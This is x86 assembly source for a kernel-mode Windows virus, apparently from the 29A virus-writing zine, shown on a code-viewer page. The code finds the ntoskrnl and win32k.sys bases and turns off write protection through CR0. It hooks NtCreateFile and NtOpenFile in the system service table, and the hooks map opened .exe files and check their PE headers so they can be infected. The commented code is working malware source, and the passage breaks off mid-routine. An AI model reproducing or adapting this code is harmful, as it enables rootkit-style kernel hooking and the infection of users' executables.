📄 29a-7.006
字号:
;;;;;;;;;;;;;
push 00000000h ;This space in stack will be filled with the entry point
;address of win32k.sys
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz R0_Doff ;i calculate delta offset.
R0_Doff:
pop ebp
sub ebp,offset R0_Doff
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
lea eax,[ebp + EPointSystem] ;our target is to search image base of win32k.sys in memory.
xor ax,ax ;hardcoded would be 0A0000000h in my system.
add eax,1000h
SearchBaseImage:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchBaseImage
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + EntryPointWin32ksys] ;We have the old entry point and the image base
add ebx,eax ;so we have the entry point address. We put
mov [esp + cPushad + cPushfd],ebx ;that entry point after pushad and pushfd bytes
;;;;;;;;;;;;;;;;;;;;;;;; ;in stack for using ret instruction later and
;for jumping entry point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[esp + cPushad + cPushfd + 4] ;address in stack of a zone of ntoskrnl(in function
xor ax,ax ;ExCreateCallback).With this address we will get
add eax,1000h ;ntoskrnl base addr
;eax -> a part of ntoskrnl
SearchNtoskrnl:
sub eax,1000h
cmp word ptr [eax],'ZM'
jne SearchNtoskrnl
;eax -> base of ntoskrnl
mov [ebp + Ntoskrnl],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will get somethings that will be useful for hooking NtCreateFile...SSDT address,
;syscall number of NtCreateFile, ....
;There is a undocumented entry in the export table of ntoskrnl, KeServiceDescriptorTable,
;and this entry is the key for accessing the system service dispatch table where we must
;patch for hooking a service(NtCreateFile for example ;)
;KeServiceDescriptorTable points to a structure like this:
; {
; DWORD ServiceTableBase - pointer to system service dispatch table(SSDT)
; DWORD ServiceCounterTable - not important for us
; DWORD NumberOfServices - number of services in system service dispatch table
; DWORD ParamTableBase - pointer to system service parameter table(SSPT)
; }
;
;We want to get the number of the NtCreateFile service and then we search in this table
;and we patch the address of NtCreateFile rutine with a address of our code
;;;;;;;;;;;;;;;;;;;;;;;;
;eax = ntoskrnl base
GezApi eax,KeServiceDescriptorTableCRC,KSDTNameLen
mov [ebp + KeServiceDescriptorTable],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;ill get SSDT from that service descriptor table
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[eax]
mov [ebp + SSDT],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill get from ntoskrnl the addr of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtCreateFileCRC,NCFNameLen
mov [ebp + NtCreateFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwCreateFileCRC,ZCFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;now ill search in the SSDT the address of the entry of NtCreateFile where we will hook
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtCreateFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;and with NtOpenFile same thing
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezApi eax,NtOpenFileCRC,NOFNameLen
mov [ebp + NtOpenFileAddr],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get service ID from ZwOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + Ntoskrnl]
GezSyscall eax,ZwOpenFileCRC,ZOFNameLen
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + SSDT]
;ebx + eax*4 -> entry
shl eax,2
add ebx,eax
;ebx -> entry
mov [ebp + NtOpenFileEntryAddr],ebx
;;;;;;;;;;;;;;;;;;;;;;;;
;We hook NtCreateFile and NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,cr0 ;we set write protect flag to 1, and in this
push eax ;supervision of writing readonly mem is disabled
or eax,00010000h ;We do this for writing SSDT coz is possible (under
mov cr0,eax ;XP is default) SSDT is read only.
;(Thx Ratter ;)
;;;;;;;;;;;;;;;;;;;;;;;;
;;;
;Note in the next inst we get the service ID of NtCreateFile and NtOpenFile from Zws funcions
;of them. I got it searching NtCreateFile and NtOpenFile in ntoskrnl and scanning SSDT
;comparing with entrys and when is the same value that is the entry.Ratter said me the problem
;of this: NtOpenFile or NtCreateFile could be previosly hooked and with this method this
;will not work( Thx again Ratter :)
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtCreateFileEntryAddr]
lea eax,[ebp + NtCreateFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,[ebp + NtOpenFileEntryAddr]
lea eax,[ebp + NtOpenFileHookRutine]
mov [ebx],eax ;in this moment we HOOK NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
pop eax ;we restore WP flag to original value
mov cr0,eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz GetApisRing0 ;ill get some apis for no calling all time GezApi
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz DeleteWin32ksy ;i must delete win32k.sy if still not deleted
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz PayloadRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
ReturnWin32ksys:
popad
popfd
ret ;previosly i moved entry point adress of win32k.sys at position in stack
;so this ret will fill eip with start point of win32k.sys
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
NtOpenFileHookRutine:
;;;;;;;;;;;;;;;;;;;;;
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookOF ;delta offset
doff_hookOF:
pop ebp
sub ebp,offset doff_hookOF
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtOpenFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtOpenFile
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtOpenFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN ULONG ShareAccess,
; IN ULONG OpenOptions
; );
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
NtCreateFileHookRutine:
pushfd
pushad
;;;;;;;;;;;;;;;;;;;;;;;;
callz doff_hookCF ;delta offset
doff_hookCF:
pop ebp
sub ebp,offset doff_hookCF
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov eax,[ebp + NtCreateFileAddr]
mov [ebp + HookRealAddr],eax ;we put the jump to real code of NtCreateFile
;;;;;;;;;;;;;;;;;;;;;;;;
;NTSTATUS NtCreateFile(
; OUT PHANDLE FileHandle,
; IN ACCESS_MASK DesiredAccess,
; IN POBJECT_ATTRIBUTES ObjectAttributes,
; OUT PIO_STATUS_BLOCK IoStatusBlock,
; IN PLARGE_INTEGER AllocationSize OPTIONAL,
; IN ULONG FileAttributes,
; IN ULONG ShareAccess,
; IN ULONG CreateDisposition,
; IN ULONG CreateOptions,
; IN ULONG EaBuffer OPTIONAL,
; IN ULONG EaLength
; );
;
;this only for NtCreateFile:
;;;;;;;;;;;;;;;;;;;;;;;;
;i get some datas from parameters
mov eax,[esp + cPushad + cPushfd + 4 + 14h]
mov [ebp + AttributesFileRing0],eax ;i get the attributes of file
mov eax,[esp + cPushad + cPushfd + 4 + 1ch]
mov [ebp + CreateDispositionFileRing0],eax ;i get manner for opening the file
mov eax,[esp + cPushad + cPushfd + 4 + 20h]
mov [ebp + CreateOptionsFileRing0],eax ;i get some more flags relative
;;;;;;;;;;;;;;;;;;;;;;;; ;to manner of opening the file
;;;;;;;;;;;;;;;;;;;;;;;;
;I want a existing file non directory
test dword ptr [ebp + CreateDispositionFileRing0],FILE_OPEN
jz StopInfectionRing0
;test dword ptr [ebp + CreateOptionsFileRing0],FILE_NON_DIRECTORY_FILE
;jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;jmpz GeneralCodeForInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GeneralCodeForInfectionRing0:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz UnhookWhile ;ill unhook apis while hooking rutine coz for example
;;;;;;;;;;;;;;;;;;;;;;;; ;if we call ZwOpenFile we will go to a infinite loop
;OBJECT_ATTRIBUTES {
; ULONG Length;
; PUNICODE_STRING ObjectName;
; HANDLE RootDirectory;
; PSECURITY_DESCRIPTOR SecurityDescriptor;
; PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
; ULONG Attributes;
; }
;
;UNICODE_STRING {
; USHORT Length; ;len in bytes of Buffer
; USHORT MaximumLength;
; PWSTR Buffer;
; }
;note if RootDirectory parameter is null,ObjectName has a fully qualified file specification,
;path+name,but if RootDirectory is non null,then ObjectName has only the name of the object
;relative to RootDirectory directory.
;when we call NtOpenFile we must use both RootDirectory and ObjectName.
;;;;;;;;;;;;;;;;;;;;;;;;
;Ill get the file name of the file i want to infect
mov edi,[esp + cPushad + cPushfd + 4 + 8] ;edi -> ObjectAttributes
mov eax,[edi + 4] ;eax = RootDirectory
mov [ebp + RootDirectoryRing0],eax
mov esi,[edi + 8] ;esi -> unicode string of the name
mov eax,[esi]
mov dword ptr [ebp + FileNameRing0],eax
lea edi,[ebp + StringRing0] ;edi -> our buffer for unicode string of name
mov dword ptr [ebp + FileNameRing0 + 4],edi
movzx ecx,word ptr [esi] ;ecx = long of unicode string
mov esi,[esi + 4]
rep movsb ;i copy the buffer
;;;;;;;;;;;;;;;;;;;;;;;;
;vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv |quitar esto| vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
movzx ecx,word ptr [ebp + FileNameRing0]
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'z'
jne StopInfectionRing0
;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |quitar esto| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
;;;;;;;;;;;;;;;;;;;;;;;;
movzx ecx,word ptr [ebp + FileNameRing0] ;I test if file is a .exe file
mov eax,dword ptr [ebp + FileNameRing0 + 4]
add eax,ecx
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'x'
jne StopInfectionRing0
dec eax
dec eax
or byte ptr [eax],20h
cmp byte ptr [eax],'e'
jne StopInfectionRing0
dec eax
dec eax
cmp byte ptr [eax],'.'
jne StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
callz MapFileRing0 ;map the file for infection ;)
or eax,eax
jz StopInfectionRing0
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
mov ebx,eax
;ebx = Base of Mapped File
cmp word ptr [ebx],'ZM'
jne CloseAndStopInfectionRing0
mov edi,[ebx + 3ch]
add edi,ebx
;edi -> PE
cmp word ptr [edi],'EP'
jne CloseAndStopInfectionRing0
cmp word ptr [edi + 8],'zs'
je CloseAndStopInfectionRing0 ;is it already infected?
mov ax,word ptr [edi + 16h]
test ax,00000002h ;yes IMAGE_FILE_EXECUTABLE_IMAGE
je CloseAndStopInfectionRing0
test ax,00001000h ;no IMAGE_FILE_SYSTEM
jne CloseAndStopInfectionRing0
test ax,00002000h ;no IMAGE_FILE_DLL
jne CloseAndStopInfectionRing0
mov ax,[edi + 5ch]
test ax,00000001h ;no IMAGE_SUBSYSTEM_NATIVE
jne CloseAndStopInfectionRing0
;ebx->MZ
;edi->PE
;;;;;;;;;;;;;;;;;;;;;;;;
;we will search EPoint of file
mov edx,[edi + 28h]
;edx = RVA epoint,we need the pointer to raw data
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
inc ecx
GoToSectionEPointInfectionRing0:
dec ecx
or ecx,ecx
jz CloseAndStopInfectionRing0
add eax,28h
cmp dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress],edx
jnle GoToSectionEPointInfectionRing0
mov esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_VirtualAddress]
add esi,dword ptr [eax.IMAGE_SECTION_HEADER.SH_SizeOfRawData]
cmp edx,esi
jnl GoToSectionEPointInfectionRing0
;eax->.text section header
mov dword ptr [ebp + textSecHeader],eax
;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;
;now we will search relocs section
mov edx,[edi.IMAGE_NT_HEADERS.NT_OptionalHeader.OH_DirectoryEntries.DE_BaseReloc.DD_VirtualAddress]
movzx ecx,word ptr [edi + 6]
mov eax,edi
add eax,0F8h-28h ;sections
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -